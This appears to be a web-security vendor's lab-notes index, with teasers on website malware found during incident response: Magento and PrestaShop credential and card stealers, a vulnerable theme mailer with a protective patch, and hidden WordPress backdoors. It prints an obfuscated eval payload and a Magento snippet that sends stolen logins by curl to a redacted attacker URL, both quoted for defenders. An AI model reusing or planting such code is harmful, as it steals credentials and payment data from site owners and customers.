Home Testimonials Company Support 1–888–873–0817
Home Notes Malware Signatures About

Recently, during an incident response process, we have found an advertisement floating banner on specific pages of an html-based website. Despite what people think, these websites are also targets of attacks and can be infected.

Different from other platforms, the entry point in this scenario is easier to be detected due to the nature of html-based pages (static content) and the reduced number of components that could make the website prone to a particular vulnerability.

Read More ...

Recently we found another variant of malware that intercepts the credit card data injected into PayPal payment method “app/code/core/Mage/Paypal/Model/Direct.php”.

Read More ...

A few weeks ago, we posted a lab notes describing a good theme file being exploited by attackers to send mass-mailing SPAM (http://labs.sucuri.net/?note=2016-08-15). Upon further investigation, we identified that attackers have been exploiting this issue for quite awhile and apparently under the radar.

The lack of security checks in that particular file allows the attackers to send as many emails as they would like to, depending on server’s configurations/limitations. To make matters worse, the code had been implemented throughout different themes developed by the same company.

The issue is located within the file ‘functions/theme-mail.php’ and can be found in older versions of the following premium themes:

bretheon, doover, fingerprints, kora, lawcenter_two,
mfl, pindol, tisson, almet, caffeine, nollie, limuso

The consequences of using those old versions vary - from having your website suspended by the hosting company, or getting the mail server blacklisted.

We didn’t have access to all versions of those themes to determine when a patch had been applied, but if you identify the same snippet as we have in the labs sucuri notes, we highly recommend adding the following code after your opening php tags to prevent direct access to the file and further exploitation:

if ( basename($_SERVER['PHP_SELF']) == basename(__FILE__) )
die('Access Denied');

If you’re a customer on the Sucuri Firewall you are already patched via our virtual patching engine.

Lately, we’ve noticed an increase of login credentials stealing attempts and techniques targeting e-commerce based websites. These websites usually have sensitive information (credit card & back-end credentials) that would allow attackers to take advantage of the information & infected website.

This post will uncover a different technique being used against PrestaShop solutions. The technique varies from the one we described in this blog post here.

In this case, attackers also used the ‘./controllers/admin/AdminLoginController.php’ file but they injected a different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:

Read More ...

While investigating a compromised Magento-based ecommerce website, we found a malicious code that’s being used to steal and maintain unauthorized access to user accounts.

This malicious code was found inside the ./app/code/core/Mage/Admin/Model/Session.php core file and it’s posting the stolen credentials to a malicious URL every time a user tries to log into their own account:

$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username,$password,$
user->getEmail(),Mage::helper('core/url')->getCurrentUrl()))); $ch = curl_init(); curl_setopt($ch,CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE)); curl_setopt($ch,CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $output = curl_exec($ch); curl_close($ch);

The above malicious code is sending and posting the stolen username & password to the encoded URL in that part of the code: base64_decode(REMOVED MALICIOUS CODE));

This is a base64_decode code and in that case it was sending and posting the information to this malicious URL:


Customer personal information (including their full name, email address, physical address which may also have any stored credit cards and payment information) are considered to be compromised and leaked.

The hacker may also redirect the payments to their own PayPal account or to any other payment gateways to steal money too, as long as they have full control over the administration panel of the Magento website.

Such attacks may have a severe and negative impact on your business reputation and customer's trust.

It’s always a good practice to keep your website updated and properly maintained as well as using applications, themes, and extensions/plugins from trusted sources only.

It’s time now to secure your website from hackers!

It’s quite common for attackers to compromise your website and make use of it for their phishing campaigns. The most typical method they use is to simply place redirects throughout your site or simply upload entire phishing folders so that your website becomes an actual phishing platform.

When the hosting finds any bad content there they usually take the swiftest action and just suspend your service until the matter is resolved. But what if the compromise started at a different level? Let’s say, the server’s error documents?

Read More ...

During an incident response process, we found a very interesting malicious code abusing some PHP tricks. Attackers placed the malware at the end of a WordPress core file ‘./wp-includes/pomo/entry.php’:


Read More ...

Lately we’ve seen more backdoors that have some specific characteristics, like using several spaces between the code and processing information coming from POST requests. Attackers use the “spacing” technique to avoid visual detection in text editors when the “word wrapping” function is deactivated.

The backdoors we are discussing today have been found mainly in WordPress platforms. Although they may have different names and can be placed in different directories, most of them can be found residing on the website’s root having a name like framework.lovely.php, framework.railroad.php, framework.ping.php and so on.

Read More ...

With so many open-source ecommerce platforms available in the market, creating an online shop is as easy as ABC. In less than five minutes you can set up your very own online storefront and offer physical and digital products for sale.

In this note I will present a malware infection on OpenCart, a powerful e-commerce shopping cart that provides great tools with minimal investment. Although its platform is simple to install and use, it doesn’t mean that you are protected against different kinds of malicious codes focused on intercepting and stealing sensitive data from your customers (credit card).

Read More ...

A few days ago, colleagues from White Fir Design disclosed an arbitrary file upload vulnerability in the WP Marketplace plugin and helped remove it from the official repository (at least until a patched version becomes available). They mentioned that they noticed attempts to exploit vulnerabilities of that plugin in the wild. Specifically, they noticed requests to the /wp-content/plugins/wpmarketplace/css/extends_page.css file - this way hackers could figure out whether the plugin was installed or not.

We checked our Website Firewall logs and confirmed that the WP Marketplace vulnerability is now a part of a hacker's toolkit. When they detect sites with the installed plugin, they try to exploit the vulnerability and upload backdoors.

Read More ...